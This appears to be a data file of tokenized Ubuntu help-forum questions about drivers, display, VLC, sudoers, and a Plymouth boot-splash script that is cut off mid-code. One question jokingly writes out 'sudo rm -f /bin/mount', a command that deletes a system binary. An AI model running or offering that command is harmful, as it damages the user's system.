50655	how to get byobu to launch tmux instead of screen ?	the latest versions of byobu should apparently be configurable to run tmux instead of screen , but i have n't been able to . advice appreciated
50656	'no battery present ' on a toshiba satellite l655	i use toshiba satellite l655 laptop , i recently installed ubuntu 10.10 . in gnome-power-manager there is no tap for 'on battery ' . when i run the command : dmesg | grep batt it returns : [ 0.752856 ] acpi : battery slot [ bat1 ] ( battery absent ) please anyone help to solve this ! thuci @ ubuntu : ~ $ cat /sys/firmware/acpi/tables/dsdt > dsdt.dat cat : /sys/firmware/acpi/tables/dsdt : permission denied
50659	google talk libcairo2 dependency is not satisfiable	i am trying to install google talk plugin for an old ubuntu 7.10 . it shows an error dependency is not satisfiable libcairo2 . is it possible to install google talk plugin for ubuntu 7.10 ? this is an old system that needs this version for compatibility with old binaries .
50664	computer janitor	i 'm willing to use computer janitor but i 'm afraid to lose some important libraries . is it secure to use computer janitor ? thanks in advance .
50665	docky 2.1.2 crashes when i try to remove a existing dock	i believe it has something to do with the mounter applet . the dock i 'm trying to remove has 2 instances running for reasons i do n't know . it also crashes when i try to remove mounter . how can i remove docky completely including all my settings ? i tried it from the software center and re-installed it but the dock i 'm trying to remove still was there . thanks in advance .
50670	compiz effects in unity 2d	if my gpu can process basic compiz effects as seen in gnome classic , will they work in unity 2d ?
50673	red5 start script not working	i have an ec2 instance running red5 and i added the following script to the scripts that run on startup and shutdown of the server : # # # # # # # # # # # # # # # # # note from dominick # first follow these directions # http : //embraceubuntu.com/2005/09/07/adding-a-startup-script-to-be-run-at-bootup/ # # # # # # # # # # # # # # # # # # author : jake hilton < red5 @ jakehilton.com > # /etc/init.d/red5 # # check for missing file red5_dir=/opt/red5 test -x $ red5_dir/red5.sh || exit 5 case `` $ 1 '' in start ) echo -n `` starting red5 service '' echo -n `` `` cd $ red5_dir su -s /bin/bash -c `` $ red5_dir/red5.sh & amp ; '' infrared5 sleep 2 ; ; stop ) echo -n `` shutting down red5 '' echo -n `` `` # # su -s /bin/bash -c `` killall -q -u infrared5 java '' infrared5 su -s /bin/bash -c `` $ red5_dir/red5-shutdown.sh & amp ; '' infrared5 sleep 2 ; ; restart ) # # stop the service and regardless of whether it was # # running or not , start it again . $ 0 stop $ 0 start ; ; esac the only change i made was the location of red5 which is in /usr/share/red5 on my instance . after following the instructions on the following site : adding a startup script to be run at bootup on how to install the script i ran the following command from the terminal /etc/init.d/red5 start and got the following : i navigate to http : //somedomain.com:5080/ which is the red5 start page and i get a 404 . rebooting the server also seems to have the same effect . not sure how to touble shoot this one and could use some help figuring out what i may be doing wrong .
50674	add files from a network location in vlc	i 'm trying to add several video files to my playlist in vlc media player . these files are located in a network location and the `` add files '' option displays only local file locations . i tried using the ip address of device but that does nothing . does anyone know how to do this ?
50676	set compositing manager preference to compiz	as i discussed in this question , for some reason , metacity was used instead of compiz even with capable gpu and driver . i want to set the preference to use conmpiz wherever possible , is there a way ?
50678	how i can recover a previous version of a file ?	i modified a .txt file and saved it . when i opened it again , i saw that i deleted one thing from the last version i saved . so i would like to know if i can recover what i deleted ? this file is very important to me . you have to help me ! my life is on this file . i did n't delete anything , i only edited the file . when i tried to save i had get an error saying that it could not read some characters so i closed the editor and when i opened it again some lines just disappeared .
50681	how to troubleshoot and tweek unreasonably slow wireless connection ?	i 've just acquired a usb f5d8053ed belkin adapter and it is unreasonably slow . details of how i installed the firmware and device driver are described in this au question . i believe there is either a problem with a driver or adapter itself that is preventing from using the full network quality . at the moment i can see that my windows laptop is performing at 30 x speed better than the ubuntu desktop pc with belkin . what are they ways to troubleshoot pure wireless network performance on ubuntu ?
50682	mouse click problem	i am running ubuntu 11.04 on compaq presario c772tu . i just noticed that i am unable to click on links/buttons/text if the mouse is in particular areas on the screen . the same link/button/text are clickable if i scroll a bit up or down . basically it feels like there is an invisible grid on the screen where the mouse is unable to identify items to click on . the same happens on desktop icons too . any help is appreciated .
50684	errors when trying to compile the driver for the rtl8192su wireless adapter	i have a wireless to usb adapter , and i 'm having some trouble to install the drivers on ubuntu . first of all , the readme says to use the make command , and i already got errors : $ make make [ 1 ] : entering directory `/usr/src/linux-headers-2.6.35-22-generic' cc [ m ] /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.o /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c : in function ‘rtl8192_usb_probe’ : /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12325 : error : ‘struct net_device’ has no member named ‘open’ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12326 : error : ‘struct net_device’ has no member named ‘stop’ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12327 : error : ‘struct net_device’ has no member named ‘tx_timeout’ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12328 : error : ‘struct net_device’ has no member named ‘do_ioctl’ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12329 : error : ‘struct net_device’ has no member named ‘set_multicast_list’ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12330 : error : ‘struct net_device’ has no member named ‘set_mac_address’ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12331 : error : ‘struct net_device’ has no member named ‘get_stats’ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.c:12332 : error : ‘struct net_device’ has no member named ‘hard_start_xmit’ make [ 2 ] : *** [ /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u/r8192u_core.o ] error 1 make [ 1 ] : *** [ _module_/home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/hal/rtl8192u ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-2.6.35-22-generic' make : *** [ all ] error 2 /home/wellington/desktop/rtl8192su_linux_2.4_2.6.0003.0301.2010/ is the path where i copied the drivers on my computer . any idea how to solve this ? ( i do n't even know what the error is ... ) update : sudo lshw -class network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 03 serial : 78 : e3 : b5 : e7:5f:6e size : 10mb/s capacity : 1gb/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mb/s resources : irq:42 ioport : d800 ( size=256 ) memory : fbeff000-fbefffff memory : faffc000-faffffff memory : fbec0000-fbedffff *-network disabled description : wireless interface physical id : 2 logical name : wlan0 serial : 00:26:18 : a1 : ae:64 capabilities : ethernet physical wireless configuration : broadcast=yes multicast=yes wireless=802.11b/g sudo lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 02:00.0 firewire ( ieee 1394 ) : via technologies , inc. vt6315 series firewire controller ( rev 01 ) sudo lsusb bus 002 device 003 : id 0bda:0158 realtek semiconductor corp. usb 2.0 multicard reader bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 045e:00f9 microsoft corp. wireless desktop receiver 3.1 bus 001 device 003 : id 0b05:1786 asustek computer , inc . bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
50687	fglrx ( catalyst 11.6 ) is it compatible with kernel 2.6.39 ?	i have recently installed kernel 2.6.39 and also updated the amd driver to version 11.6 , however seems like it 's not working . i was hoping that with this new driver amd had support for the new kernel , but it does n't . when i boot using the new kernel i practically get no compositing , and everything is really ugly . how ( if possible ) can i patch or else do something about this ?
50692	installing updates froze virtual machine	i was just installing updates for 10.10 amd_64 ubuntu desktop guest system , but the system seems to have frozen while applying changes , going into host-f1 terminals does n't work . if i do a hard reset of the virtual machine , what sort of manteinance/recovery operation should i do ? any apt-get commands i should do to rollback the installation/obtain more info of the problem ?
50693	does ubuntu include support for the intel gma 500 ?	i would like to know if the new open-source video driver included in kernel 3.0.x for the intel gma 500 will be included by default in the kernel that will be shipped in oneiric ocelot . the driver support of this gfx chipset has always been poor and mainly community-driven , now finally we have a kms open-source driver , written by kernel hackers , and actually included in staging kernel repo . if there is any kind of testing needed there is a mega-thread on ubuntu forums with hundreds of users ready to test everything .
50697	alsa does n't work in vlc	alsa audio output works fine from terminal , e.g . aplay /usr/share/sounds/alsa/noise.wav . but i got to change from default to alsa audio output in vlc . i found it in tools > perfernces > audio > outputs . the issue is that when i change it to alsa , i loose all sound . when i leave the default i get an annoying audio delay of about 200ms or 500ms . from what i have found you have to use alsa audio outpu to fix that issue .
50701	button `` add '' is disabled in vpn connection 's dialog	i 've just installed elementaryos-jupiter . ( it 's based on ubuntu 10.10 ) i 've entered vpn connections ' menu ( nm - > vpn connections - > configure vpn ) and there should be button `` add '' - > it is , but it 's disabled ( i ca n't press on it ) i 'm connecting via ethernet ( lan in a students ' hostel ) and we get internet via vpn connection ( it worked for me in ubuntu for a few years ) any suggestions ? i 've asked on irc of elementaryos ( there were few people ) but they said that vpn is out-of-box , and it should work - they never met this .
50702	recovering from mount gone wrong	i was trying to break some files out of my virtualbox install of ubuntu , and i accidentally mounted a virtualbox shared folder onto ~ , thereby erasing the very files i was trying to get at . is there any way to recover my hard work , or am i just going to have to sudo rm -f /bin/mount and start over ? and no , i do n't seriously intend to rm -f /bin/mount .
50704	sudo error , is mode 0777 , should be 0440	i am getting sudo errors , how do i fix this error ? sudo : /etc/sudoers is mode 0777 , should be 0440 sudo : no valid sudoers sources found , quitting
50706	menu and title do n't line up in the top panel ?	i got a little issue with title and menu in top panel . as you can see , the menu is a bit lower than the title . how can i fix it ? im using 11.04 with unity . i 've tried to modify in metacity-theme-1.xml but nothing changed .
50708	what do the `` no '' s mean , in the output of unity support test ?	not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : no gl vertex program : no gl fragment program : no gl vertex buffer object : yes gl framebuffer object : no gl version is 1.4+ : no unity supported : no
50714	ca n't install ubuntu on a hp dv6 laptop	i just bought a hp dv6 6011tx ( link ) laptop . i formated the disk through windows and prepared for installing ubuntu . but when i inserted the live cd , it showed the ubuntu start screen and then everything went black . there was no cursor , everything just stayed black like the screen was switched off ( but the system is running ) . when i tried to install from the usb , it said live media is not found . sometimes it also gave me a black screen like the cd . does anyone have any idea how to fix this ? thanks !
50718	why is my card unity blacklisted with all the requirements fulfilled ?	the following is the unity test output : opengl vendor string : nvidia corporation opengl renderer string : geforce fx 5500/agp/sse2 opengl version string : 2.1.2 nvidia 173.14.30 not software rendered : yes not blacklisted : no glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : no as you can see , all requirements are fulfilled but my gpu is blacklisted . what can i do about it ?
50721	ubuntu 11.04 ( natty ) does n't install properly	i have a new computer and want to install ubuntu on it . i downloaded the .iso and burnt it to a disk , but whenever i select install , it comes up with an error . i have tried with numerous disks , but with no change . it is also super slow to get to that stage . could you please help ? the error says : a serious error has occurred . ubuntu will switch to desktop view so you can see the error and retry installation . i have checked the cd for errors and it passes all the tests
50722	why are notifications appearing in the invisible black zone above my monitor ?	i 've got two monitors , with the right side one being slightly lower in the display settings . however any notifications i receive from notify-osd ( including pidgin , notify-send etc ) are sent to the top-most part of the right monitor screen , which results it in being invisible . and here 's a pic of my monitor preferences : i 'd earlier used the wallpaper plugin in compiz to stitch my desktops , and then uninstalled compiz-extras . i 'm using ubuntu 11.04 in classic mode .
50728	lua or ruby ( or something else ? ) for scripting ?	i 'm making a program in java and i 'm choosing a language for scripting . i 'm aiming for speed and for being easy to learn/code for a java program . ( so what i mean by ruby and lua is jruby or luaj or what ever the best java alternative to these languages are ) or might python or perl ( or another language that can be used with java ) be good ? [ i 'm trying to make a game with java for ubuntu , with an easy language for scripting ]
50735	mono , failing to open executable	i am trying to open a simple executable using mono , as wine told me to install mono for .net applications , and this is the error i get mono yt.exe ** message : unknown heap type : # guld ** message : unknown heap type : # blop ** ( yt.exe:2508 ) : warning ** : the following assembly referenced from /home/austin/downloads/yt.exe could not be loaded : assembly : system.windows.forms ( assemblyref_index=0 ) version : 4.0.0.0 public key : b77a5c561934e089 the assembly was not found in the global assembly cache , a path listed in the mono_path environment variable , or in the location of the executing assembly ( /home/austin/downloads/ ) . ** ( yt.exe:2508 ) : warning ** : could not load file or assembly 'system.windows.forms , version=4.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' or one of its dependencies . ** ( yt.exe:2508 ) : warning ** : missing method enablevisualstyles in assembly /home/austin/downloads/yt.exe , type system.windows.forms.application unhandled exception : system.io.filenotfoundexception : could not load file or assembly 'system.windows.forms , version=4.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' or one of its dependencies . file name : 'system.windows.forms , version=4.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089' thanks for any help , i 've looked everywhere and ca n't figure out what 's wrong .
50738	which entry in /usr/share/gnome-session/sessions corresponds to what ?	related to this answer . : /usr/share/gnome-session/sessions $ ls 2d-gnome.session classic-gnome.session ubuntu.session 2d-ubuntu.session gnome.session
50740	failing at resuming after suspension ( but not after hibernation )	dell xps1330 , nvidia gpu . before 11.04 installation , suspension and hibernation worked fine ( since the 8.10 era ... ) . for the 11.04 release , i decided for a full installation instead of the release upgrade . now after suspension i ca n't resume : the display power-up and then power-down almost immediately , then numlock and capslock leds start blinking - after that i force shutdown . hibernation still works fine . where do i start looking to get what failed during suspension/resuming ?
50742	quality of flash playback on lubuntu 11.04 is bad	as the title says it is bad with a lot of tearing . the strange thing is that with the standard ubuntu ( classic mode no effects ) it works smoothly , better than ever before it seems by the way . ati hd 4350 with proprietary drivers through additional drivers the latest firefox 5.0 ( or chromium , does n't matter ) latest flash tried lubuntu-desktop on `` top of '' ubuntu tried lxde-core on `` top of '' ubuntu tried lubuntu with the `` standalone '' install disk always the same results . i really like lxde for its speed/responsiveness and ubuntu , but this is a big show stopper . does anybody has the same/similar issues ? i find it really strange and from a noob 's perspective it makes no sense and is almost not excusable . ; ) edit : sorry for the missing piece of info . i use the adobe flash package from the canonical partner repository . no flash aid with firefox . my understanding was that chromium doesnt come with the build in flash ?
50749	horizontal scrolling treated as right click in java applications	i 've enabled horizontal scrolling for my touchpad in ubuntu 11.04 , but when using it in java applications ( netbeans in my case ) it is instead as a right click . horizontal scrolling works perfectly in all applications that are not written in java . what can i do to make it work properly ?
50751	how to generate an extended f key press ( f13-f20 ) ?	i need to submit an extended function key ( like f17 or f17 ) to a program that runs in the terminal ( i use the default gnome-terminal but could use another if it works there ) . is there a way in ubuntu 11.04 to generate those key hits ? i 'm searching for something like shift+f7 to generate f17 ( what i currently use in reflection under windows ) . my keyboard is set to generic 105 keys pc with the us qwerty layout .
50753	need to unlock the machine several time in the course of a session	it is irksome to have to unlock the system every few minutes for a single home user . after a few minutes idle time the screen switches off and needs password to reopen . ca n't there be a screen saver arrangement instead ? is there any thing i can do to so configure my system ?
50754	tty [ 1-6 ] : lock screen after delay ( like a screensaver )	when using the virtual terminals on tty 1-6 [ * ] , it 's sometimes easy to forget to log out : the screen goes blank after a while , but i 'm still logged in - no password required , anyone can use my account . ( or i switch to another tty , and forget the other one ... ) i 'd like to have screensaver-like functionality that locks the terminal after 3 minutes , and then requires a password . how do i set this up ? [ * ] with tty 1-6 , i mean ctrlaltf1 - ctrlaltf6 ( no x server )
50757	how to get plymouth to display boot messages when booting ?	i would like to know how to create a splash for ubuntu maverick with boot messages being displayed when i boot as well as a progress bar and a spinning logo . or , if possible , how to edit a splash which already has a spinning logo and a progress bar , and add boot messages to it . this is the theme i would like to edit : ubuntu 10.04 and 10.10 plymouth splash and i would like something like this : or this , which is the exact splash i want to create : i was able to find this website it has a lot of usefull information but am havin a hard time understanding some of it . havent done any scripting before ! create your own splash screen with scrolling boot messages plymouth scripting and this is another website wich can help with scripting this is the script for the progress bar in the splash : # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - progress bar -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- progress_box.image = image ( `` progress_box.png '' ) ; progress_box.sprite = sprite ( progress_box.image ) ; progress_box.x = window.getx ( ) + window.getwidth ( ) / 2 - progress_box.image.getwidth ( ) / 2 ; progress_box.y = window.gety ( ) + window.getheight ( ) * 0.65 - progress_box.image.getheight ( ) / 2 ; progress_box.sprite.setposition ( progress_box.x , progress_box.y , 0 ) ; progress_bar.original_image = image ( `` progress_bar.png '' ) ; progress_bar.sprite = sprite ( ) ; progress_bar.x = window.getx ( ) + window.getwidth ( ) / 2 - progress_bar.original_image.getwidth ( ) / 2 ; progress_bar.y = window.gety ( ) + window.getheight ( ) * 0.65 - progress_box.image.getheight ( ) / 2 + ( progress_box.image.getheight ( ) - progress_bar.original_image.getheight ( ) ) / 2 ; progress_bar.sprite.setposition ( progress_bar.x , progress_bar.y , 1 ) ; fun progress_callback ( duration , progress ) { if ( progress_bar.image.getwidth ( ) ! = math.int ( progress_bar.original_image.getwidth ( ) * progress ) ) { # add the * 3 to multiply the speed of the progress bar by 3 progress_bar.image = progress_bar.original_image.scale ( progress_bar.original_image.getwidth ( progress_bar.original_image ) * progress * 3 , progress_bar.original_image.getheight ( ) ) ; progress_bar.sprite.setimage ( progress_bar.image ) ; } } plymouth.setbootprogressfunction ( progress_callback ) ; ok so i did a lot more searching and i was able to learn a bit more about plymouth . these are the sites that i found useful . plymouth theming guide there are four parts to that article you have to read through them to get the gist of what we are doing . ( i was comparing their script with the script for my splash to understand what is what , i recommend doing that if anyone is to follow in my footsteps . ) plymouth scripting ok this link has 2 pages had to go through them to understand what to do . turns out they were after the same thing i was , which is to direct boot messages to the plymouth splash where i already have a spinning logo , background , progress bar . so i had to edit my /lib/lsb/init-functions file and make it so that it would send the boot error/success , etc messages to plymouth by adding this paragraph # send messages to plymouth if [ -x /bin/plymouth ] & & pidof plymouthd > /dev/null then plymouth_send ( ) { [ `` $ 1 '' = '-n ' ] & & { # add a flag ' > ' for lines that will be extended shift /bin/plymouth message -- text= '' > $ * '' || true return } [ `` $ 1 '' = '-w ' ] & & { # add `` warning '' formatting shift /bin/plymouth update -- status= '' warning '' || true /bin/plymouth message -- text= '' $ * '' || true /bin/plymouth update -- status= '' normal '' || true return } [ `` $ 1 '' = '-f ' ] & & { # add `` failed '' formatting shift /bin/plymouth update -- status= '' failed '' || true /bin/plymouth message -- text= '' $ * '' || true /bin/plymouth update -- status= '' normal '' || true return } /bin/plymouth message -- text= '' $ * '' || true } else plymouth_send ( ) { : ; } fi # int log_begin_message ( char *message ) log_begin_msg ( ) { if [ -z `` $ { 1 : - } '' ] ; then return 1 fi echo -n `` $ @ '' } as well as adding # only do the fancy stuff if we have an appropriate terminal # and if /usr is already mounted if log_use_fancy_output ; then red=` $ tput setaf 1` yellow=` $ tput setaf 3` normal=` $ tput op` else red= '' yellow= '' normal= '' fi if [ $ 1 -eq 0 ] ; then echo `` . '' plymouth_send `` . '' elif [ $ 1 -eq 255 ] ; then /bin/echo -e `` $ { yellow } ( warning ) . $ { normal } '' plymouth_send -w `` ( warning ) . '' else /bin/echo -e `` $ { red } failed ! $ { normal } '' plymouth_send -f `` failed ! '' fi log_end_msg_post `` $ @ '' return $ retval } log_action_msg ( ) { echo `` $ @ . '' plymouth_send `` $ @ . '' } log_action_begin_msg ( ) { echo -n `` $ @ ... '' plymouth_send -n `` $ @ ... '' } log_action_cont_msg ( ) { echo -n `` $ @ ... '' plymouth_send -n `` $ @ ... '' } log_action_end_msg ( ) { log_action_end_msg_pre `` $ @ '' if [ -z `` $ { 2 : - } '' ] ; then end= '' . '' else end= '' ( $ 2 ) . '' fi if [ $ 1 -eq 0 ] ; then echo `` done $ { end } '' plymouth_send `` done $ { end } '' else if log_use_fancy_output ; then red=` $ tput setaf 1` normal=` $ tput op` /bin/echo -e `` $ { red } failed $ { end } $ { normal } '' else echo `` failed $ { end } '' plymouth_send -f `` failed $ { end } '' fi fi log_action_end_msg_post `` $ @ '' } so far i was n't able to get the messages through to plymouth , but i did get a better understanding of how plymouth scripting works ! i do n't know what else am supposed to do to make it work ! hoping somebody here can help me out ohh and here is my version of the script for the splash i am working on . # int2mil-ubuntu-10.10-eng splashy like theme window.getmaxwidth = fun ( ) { i = 0 ; width = 0 ; while ( window.getwidth ( i ) ) { width = math.max ( width , window.getwidth ( i ) ) ; i++ ; } return width ; } ; window.getmaxheight = fun ( ) { i = 0 ; height = 0 ; while ( window.getheight ( i ) ) { height = math.max ( height , window.getheight ( i ) ) ; i++ ; } return height ; } ; anim.imagecount = 100 ; anim.target_width = 0.2* 0.46 * window.getwidth ( ) ; anim.target_height = 0.2* 0.46 * window.getwidth ( ) ; fun rotatedimage ( index ) { index = math.int ( index ) ; if ( ! rotatedimagecache [ index ] ) rotatedimagecache [ index ] = anim.original_image.rotate ( ( math.pi*2*index ) /anim.imagecount ) .scale ( anim.target_width , anim.target_height ) ; return rotatedimagecache [ index ] ; } if ( plymouth.getmode ( ) == `` suspend '' || plymouth.getmode ( ) == `` resume '' ) { background.original_image = imagenew ( `` suspend.png '' ) ; window.setbackgroundtopcolor ( 1 , 0 , 0 ) ; window.setbackgroundbottomcolor ( 0 , 1 , 0 ) ; } else { logo.original_image = imagenew ( `` logo.png '' ) ; background.original_image = imagenew ( `` background.png '' ) ; window.setbackgroundtopcolor ( 0.234 , 0.43 , 0.705 ) ; window.setbackgroundbottomcolor ( 0.16 , 0.25 , 0.44 ) ; anim.image= imagenew ( `` animation.png '' ) ; anim.original_image= anim.image.scale ( anim.target_width , anim.target_width ) ; anim.sprite = spritenew ( ) ; anim.sprite.setimage ( rotatedimage ( 0 ) ) ; anim.sprite.setx ( ( window.getx ( ) + window.getwidth ( ) - rotatedimage ( 0 ) .getwidth ( ) ) / 2 ) ; anim.sprite.sety ( window.gety ( ) + window.getheight ( ) * 0.37 ) ; anim.angle = 0 ; anim.index = 0 ; } # change reduction size to make logo bigger ratio = logo.original_image.getwidth ( ) / logo.original_image.getheight ( ) ; reduction = 0.4 ; logo.image = logo.original_image.scale ( reduction * window.getmaxwidth ( ) , reduction / ratio * window.getmaxwidth ( ) ) ; logo.sprite = spritenew ( ) ; logo.sprite.setimage ( logo.image ) ; logo.opacity_angle = 0 ; # change logo location logo.sprite.setx ( ( window.getx ( ) + window.getmaxwidth ( ) - logo.image.getwidth ( ) ) / 2 ) ; logo.sprite.sety ( window.gety ( ) + window.getheight ( ) * 0.37 ) ; # background image attributs x , z , y background.image = background.original_image.scale ( window.getmaxwidth ( ) , window.getmaxheight ( ) ) ; background.sprite = spritenew ( ) ; background.sprite.setimage ( background.image ) ; background.sprite.setposition ( window.getx ( ) , window.gety ( ) , -10 ) ; sprite_prompt = spritenew ( ) ; fun refresh_callback ( ) { if ( status == `` normal '' ) { # anim.index=speed of rotation anim.index += 1 ; anim.index % = anim.imagecount ; anim.sprite.setimage ( rotatedimage ( anim.index ) ) ; # anim.sprite.setopacity ( 1 ) ; motif.sprite.setopacity ( motif.opacity ) ; } else { anim.sprite.setopacity ( 0 ) ; motif.sprite.setopacity ( 0 ) ; } } if ( plymouth.getmode ( ) ! = `` suspend '' & & plymouth.getmode ( ) ! = `` resume '' ) { plymouth.setrefreshfunction ( refresh_callback ) ; } # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - dialog -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- status = `` normal '' ; fun dialog_setup ( ) { local.box ; local.lock ; local.entry ; local.prompt_sprite ; box.image = imagenew ( `` box.png '' ) ; lock.image = imagenew ( `` lock.png '' ) ; entry.image = imagenew ( `` entry.png '' ) ; box.sprite = spritenew ( ) ; box.sprite.setimage ( box.image ) ; box.x = window.getx ( ) + window.getwidth ( ) / 2 - box.image.getwidth ( ) /2 ; box.y = window.gety ( ) + window.getheight ( ) / 2 - box.image.getheight ( ) /2 ; box.z = 10000 ; box.sprite.setposition ( box.x , box.y , box.z ) ; lock.sprite = spritenew ( ) ; lock.sprite.setimage ( lock.image ) ; lock.x = box.x + box.image.getwidth ( ) /2 - ( lock.image.getwidth ( ) + entry.image.getwidth ( ) ) / 2 ; lock.y = box.y + box.image.getheight ( ) /2 - lock.image.getheight ( ) /2 ; lock.z = box.z + 1 ; lock.sprite.setposition ( lock.x , lock.y , lock.z ) ; entry.sprite = spritenew ( ) ; entry.sprite.setimage ( entry.image ) ; entry.x = lock.x + lock.image.getwidth ( ) ; entry.y = box.y + box.image.getheight ( ) /2 - entry.image.getheight ( ) /2 ; entry.z = box.z + 1 ; entry.sprite.setposition ( entry.x , entry.y , entry.z ) ; prompt_sprite = spritenew ( ) ; prompt_sprite.setposition ( box.x , box.y - 20 , box.z ) ; global.dialog.box = box ; global.dialog.lock = lock ; global.dialog.entry = entry ; global.dialog.bullet_image = imagenew ( `` bullet.png '' ) ; global.dialog.prompt_sprite = prompt_sprite ; dialog_opacity ( 1 ) ; } fun dialog_opacity ( opacity ) { dialog.box.sprite.setopacity ( opacity ) ; dialog.lock.sprite.setopacity ( opacity ) ; dialog.entry.sprite.setopacity ( opacity ) ; dialog.prompt_sprite.setopacity ( opacity ) ; for ( index = 0 ; dialog.bullet [ index ] ; index++ ) { dialog.bullet [ index ] .sprite.setopacity ( opacity ) ; } } fun display_normal_callback ( ) { global.status = `` normal '' ; if ( global.dialog ) dialog_opacity ( 0 ) ; } fun display_password_callback ( prompt , bullets ) { global.status = `` password '' ; if ( ! global.dialog ) dialog_setup ( ) ; else dialog_opacity ( 1 ) ; motif.sprite.setopacity ( 0 ) ; anim.sprite.setopacity ( 0 ) ; dialog.prompt_sprite.setimage ( image.text ( prompt , 1.0 , 1.0 , 1.0 ) ) ; for ( index = 0 ; dialog.bullet [ index ] || index < bullets ; index++ ) { if ( ! dialog.bullet [ index ] ) { dialog.bullet [ index ] .sprite = spritenew ( ) ; dialog.bullet [ index ] .sprite.setimage ( dialog.bullet_image ) ; dialog.bullet [ index ] .x = dialog.entry.x + index * dialog.bullet_image.getwidth ( ) ; dialog.bullet [ index ] .y = dialog.entry.y + dialog.entry.image.getheight ( ) / 2 - dialog.bullet_image.getheight ( ) / 2 ; dialog.bullet [ index ] .z = dialog.entry.z + 1 ; dialog.bullet [ index ] .sprite.setposition ( dialog.bullet [ index ] .x , dialog.bullet [ index ] .y , dialog.bullet [ index ] .z ) ; } if ( index < bullets ) dialog.bullet [ index ] .sprite.setopacity ( 1 ) ; else dialog.bullet [ index ] .sprite.setopacity ( 0 ) ; } } fun display_message_callback ( prompt ) { prompt = image.text ( prompt,1.0 , 1.0 , 1.0 ) ; sprite_prompt.setimage ( prompt ) ; sprite_prompt.setposition ( window.getx ( ) + ( window.getwidth ( ) - prompt.getwidth ( ) ) / 2 , window.gety ( ) + window.getheight ( ) * 0.93 , 2 ) ; } /* instantiate dialog at startup , to ensure all icons are loaded in memory before initrd is unmounted , in case /usr is n't mounted yet */ dialog_setup ( ) ; dialog_opacity ( 0 ) ; plymouth.setdisplaynormalfunction ( display_normal_callback ) ; plymouth.setdisplaypasswordfunction ( display_password_callback ) ; plymouth.setmessagefunction ( display_message_callback ) ; # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - progress bar -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- progress_box.image = image ( `` progress_box.png '' ) ; progress_box.sprite = sprite ( progress_box.image ) ; progress_box.x = window.getx ( ) + window.getwidth ( ) / 2 - progress_box.image.getwidth ( ) / 2 ; progress_box.y = window.gety ( ) + window.getheight ( ) * 0.65 - progress_box.image.getheight ( ) / 2 ; progress_box.sprite.setposition ( progress_box.x , progress_box.y , 0 ) ; progress_bar.original_image = image ( `` progress_bar.png '' ) ; progress_bar.sprite = sprite ( ) ; progress_bar.x = window.getx ( ) + window.getwidth ( ) / 2 - progress_bar.original_image.getwidth ( ) / 2 ; progress_bar.y = window.gety ( ) + window.getheight ( ) * 